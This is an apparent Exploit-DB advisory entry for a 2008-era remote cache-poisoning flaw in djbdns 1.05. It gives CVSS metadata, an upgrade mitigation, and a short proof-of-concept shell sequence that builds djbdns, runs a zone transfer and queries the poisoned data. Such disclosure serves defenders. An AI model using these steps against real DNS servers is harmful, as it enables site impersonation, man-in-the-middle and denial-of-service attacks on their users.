djbdns Package Remote Cache-Poisoning Vulnerability

vendor:

djbdns

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Cache-Poisoning

CWE

Product Name: djbdns

Affected Version From: djbdns 1.05

Affected Version To: djbdns 1.05

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

djbdns Package Remote Cache-Poisoning Vulnerability

The 'djbdns' package is prone to a remote cache-poisoning vulnerability. An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.

Mitigation:

Upgrade to the latest version of djbdns package.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/33937/info

The 'djbdns' package is prone to a remote cache-poisoning vulnerability.

An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.

This issue affects djbdns 1.05; other versions may also be vulnerable.

# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88

# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05

# Use tcpclient and axfr-get to do a zone transfer for
# www.example.com from www.example2.com.
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp

# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data

# Simulate an A query for www.example.com using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.example.com